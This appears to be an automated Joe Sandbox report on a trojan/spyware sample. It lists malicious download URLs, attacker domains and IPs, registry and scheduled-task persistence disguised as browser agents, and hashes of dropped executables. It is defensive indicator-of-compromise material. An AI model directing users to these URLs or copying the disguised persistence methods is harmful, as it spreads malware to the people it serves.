http://91.219.236.97//l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0	0%	Avira URL Cloud	safe
http://telegalive.top/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
privacytoolzforyou-6000.top	185.98.87.159	true	false	high
toptelete.top	172.67.160.46	true	false	high
cdn.discordapp.com	162.159.130.233	true	false	high
api.2ip.ua	77.123.139.190	true	false	high
znpst.top	31.166.224.38	true	false	high
nusurtal4f.net	45.141.84.21	true	false	high
hajezey1.top	185.98.87.159	true	false	high
sysaheu90.top	185.98.87.159	true	false	high
telegalive.top	unknown	unknown	false	high
xacokuo8.top	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sysaheu90.top/game.exe	true	Avira URL Cloud: malware	unknown
http://privacytoolzforyou-6000.top/downloads/toolspab2.exe	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg	false		high
https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg	false		high
http://toptelete.top/agrybirdsgamerept	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg	false		high
http://hajezey1.top/	true	Avira URL Cloud: malware	unknown
http://91.219.236.97/	true	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg	false		high
http://nusurtal4f.net/	false	Avira URL Cloud: safe	unknown
http://znpst.top/dl/buildz.exe	true	Avira URL Cloud: malware	unknown
http://91.219.236.97//l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146	true	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpg	false		high
http://91.219.236.97//l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://tempuri.org/DetailsDataSet1.xsd	3C84.exe, 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	false		high
https://duckduckgo.com/ac/?q=	5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	false		high
http://www.fontbureau.comessed	9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/~	9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://telegalive.top/T#	5483.exe, 0000001B.00000003.903420999.0000000002F0C000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.jiyu-kobo.co.jp/9	9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comtue	9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comB.TTF	9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp//	9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0	9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.ascendercorp.com/typedesigners.html	9415.exe, 0000001D.00000003.911648441.0000000006141000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/8?QRs	9415.exe, 0000001D.00000003.912899676.000000000611E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	AdvancedRun.exe, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp	false		high
http://www.urwpp.de	9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com	9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	false		high
https://api.ip.sb/ip	aspnet_regbrowsers.exe, 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comF	9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	false		high
http://www.jiyu-kobo.co.jp/T	9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/8	3C84.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/	9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/B	9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comd	9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comC.TTF	9415.exe, 0000001D.00000003.920199088.000000000611E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	false		high
http://www.founder.com.cn/cn	9415.exe, 0000001D.00000003.900774797.0000000006141000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comFq	9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn-:	9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.zhongyicts.com.cnx)T	9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.zhongyicts.com.cno.n)N	9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/	9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.903625198.000000000611E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.como	9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	false		high
http://telegalive.top/	5483.exe, 0000001B.00000003.890205524.0000000002F0C000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.98.87.159	privacytoolzforyou-6000.top	Russian Federation	205840	VM-HOSTINGRU	false
45.141.84.21	nusurtal4f.net	Russian Federation	206728	MEDIALAND-ASRU	false
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
91.219.236.97	unknown	Hungary	56322	SERVERASTRA-ASHU	true
162.159.129.233	unknown	United States	13335	CLOUDFLARENETUS	false
31.166.224.38	znpst.top	Saudi Arabia	35819	MOBILY-ASEtihadEtisalatCompanyMobilySA	false
172.67.160.46	toptelete.top	United States	13335	CLOUDFLARENETUS	false
216.128.137.31	unknown	United States	20473	AS-CHOOPAUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	511974
Start date:	29.10.2021
Start time:	20:47:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	F7E3DjYJpC.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@51/35@62/9
EGA Information:	Failed
HDC Information:	Successful, ratio: 33.3% (good quality ratio 22.8%) Quality average: 45.7% Quality standard deviation: 38.4%
HCA Information:	Successful, ratio: 55% Number of executed functions: 102 Number of non-executed functions: 416
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 173.222.108.210, 173.222.108.226, 20.54.110.249, 52.251.79.25, 40.112.88.60, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing network information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:49:31	Task Scheduler	Run new task: Firefox Default Browser Agent 5BBA59B9B3AB12F2 path: C:\Users\user\AppData\Roaming\iwbavbe
20:50:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\31F4.exe
20:50:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\31F4.exe
20:50:23	API Interceptor	9x Sleep call for process: 5483.exe modified
20:50:34	API Interceptor	36x Sleep call for process: powershell.exe modified
20:50:44	Task Scheduler	Run new task: Firefox Default Browser Agent CD2608CF75A4E16F path: C:\Users\user\AppData\Roaming\ssbavbe
20:50:50	Task Scheduler	Run new task: Firefox Default Browser Agent 79F56FD6B947EFD5 path: C:\Users\user\AppData\Roaming\abbavbe
20:51:01	Task Scheduler	Run new task: sqtvvs.exe path: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe
20:51:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\ac4cb0e3-203c-4138-916a-ede52c5b3b73\16BC.exe" --AutoStart
20:51:51	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\ac4cb0e3-203c-4138-916a-ede52c5b3b73\16BC.exe s>--Task

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\1xVPfvJcrg Download File
Process:	C:\Users\user\AppData\Local\Temp\5483.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\RYwTiizs2t Download File
Process:	C:\Users\user\AppData\Local\Temp\5483.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\frAQBc8Wsa Download File
Process:	C:\Users\user\AppData\Local\Temp\5483.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\AppData\Local\Temp\5483.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\5483.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\31F4.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\31F4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.345981753770044
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLUE4K5E4Ks2wKDE4KhK3VZ9pKhk
MD5:	044A637E42FE9A819D7E43C8504CA769
SHA1:	6FCA27B1A571B73563C8424C84F4F64F3CBCBE2F
SHA-256:	E88E04654826CE00CC7A840745254164DDBD175066D6E4EA6858BF0FE463EBB4
SHA-512:	C9A74FA4154FA5E5951B0EEAC5330CA4BAC981FF9AD24C08575A76AD5D99CFB68556B9857C9C8209A1BFCB43F82E00F14962987A18A92A715F45AD0D4E4A718C
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.996142136926143
Encrypted:	false
SSDEEP:	384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
MD5:	B7D3A4EB1F0AED131A6E0EDF1D3C0414
SHA1:	A72E0DDE5F3083632B7242D2407658BCA3E54F29
SHA-256:	8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
SHA-512:	F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22312
Entropy (8bit):	5.605990578017244
Encrypted:	false
SSDEEP:	384:NYtCD7h0OdZVjVWWnT+RAS0nojultIC77Y9gZSJ3xOT1MajZlgRV7D+3DOZBDI+b:NjB3rn7ToClt9fZc8CSfYnDVV
MD5:	0CDC99AF66F9ADDE27ED2357375B0D2F
SHA1:	463721FB2EB09CC4347CEF475CA378924E738B57
SHA-256:	27A291B6048B130B069CB0847AC8D24CDF83D9A5864B3DB89B211902FE51C866
SHA-512:	0A41A9FDF706C34DC0595BDE2F8A33349DAA8052D8D0CF0A5FDA748409CB745EFEDCF820264F06684113E15CE6F668E7E8A5D72F4E6B7E239733013AD349CB6C
Malicious:	false
Reputation:	unknown
Preview:	@...e...................h...~.w.t.......Z.I..........@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\1105.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\20BD.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1622408
Entropy (8bit):	6.298350783524153
Encrypted:	false
SSDEEP:	24576:hNZ04UyDzGrVh8xsPCw3/dzcldJndozS35IW1q/kNVSYVEs4j13HLHGJImdV4q:dGrVr3hclvnqzS35IWk/LvRHb0
MD5:	BFA689ECA05147AFD466359DD4A144A3
SHA1:	B3474BE2B836567420F8DC96512AA303F31C8AFC
SHA-256:	B78463B94388FDDB34C03F5DDDD5D542E05CDED6D4E38C6A3588EC2C90F0070B
SHA-512:	8F09781FD585A6DFB8BBC34B9F153B414478B44B28D80A8B0BDC3BED687F3ADAB9E60F08CCEC5D5A3FD916E3091C845F9D96603749490B1F7001430408F711D4
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L!y>.@.m.@.m.@.m...l.@.mg$.l.@.mg$.lN@.mg$.l.A.mg$.l.@.mg$.l.@.mg$.m.@.mg$.l.@.mRich.@.m........................PE..L...s<s............!.....,...................P....(K......................................@A.............................&..............8............h...Y.......N..`l..T............................................................................text....).......*.................. ..`RT...........@...................... ..`.data...dW...P.......0..............@....mrdata.h#.......$...>..............@....00cfg...............b..............@..@.rsrc...8............d..............@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1254.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	512952
Entropy (8bit):	7.861107666291364
Encrypted:	false
SSDEEP:	12288:2w86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+w:2VhdLVg2Zep7njXzPDxC+w
MD5:	42758E2569239A774BECDB12698B124C
SHA1:	4AB353C4177A69FC9A6F3844852762809591DD2F
SHA-256:	E3380DFDD6297AC134BB22C7C1603782F198A5B2164855BF66A95BAE47AB472D
SHA-512:	959A6D4E39BC949F8C92C4213A7DD424EFF46AACCBCE6553D42863F4341B934CEB14997F67FDC2013D064A09C6134B9A113438347B7DEDF65E3A7E2ADA5DEF18
Malicious:	true
Yara Hits:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\1254.exe, Author: Florian Roth
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. ....................... ............`.................................D...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........t...^..........HY..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................

C:\Users\user\AppData\Local\Temp\16BC.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	876544
Entropy (8bit):	7.46001855809545
Encrypted:	false
SSDEEP:	12288:DQ+moey9f5J3x6dPmrB5PlBmDyP11an6zGjzpB0w9ptCQIrkOpG82bUyXwkSjU:k+EyJr7lga1S3wStCQI5pbyw
MD5:	9F279C4F486701860F5867EC433715A3
SHA1:	76E941844776EB80E62EFAA09168D616299EE9DB
SHA-256:	3B7A0B9D932269850390271FE5E196D42175DC9D17C69E4764F00627C17E58D1
SHA-512:	53003A9F60EECD027DBD28C91216A42CBCC40DFCE22014CD02179CEF5B61DA956D0D0B1C51830B90C1C7D85C48E01BEE9ABD1CE0860F0C09790A60700F4A0169
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..C4w.C4w.C4w.,B..n4w.,B..a4w.,B..<4w.JL..D4w.C4v.=4w.,B..B4w.,B..B4w.,B..B4w.RichC4w.................PE..L......_......................p...................@...........................\|.....L...........................................P....p{..?....................{.D...0...............................p...@............................................text............................... ..`.data....io.........................@....nuwomux.....`{.....................@....rsrc....?...p{..@..................@..@.reloc..."....{..$...<..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\20BD.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	212992
Entropy (8bit):	6.734269361613487
Encrypted:	false
SSDEEP:	3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
MD5:	73252ACB344040DDC5D9CE78A5D3A4C2
SHA1:	3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
SHA-256:	B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
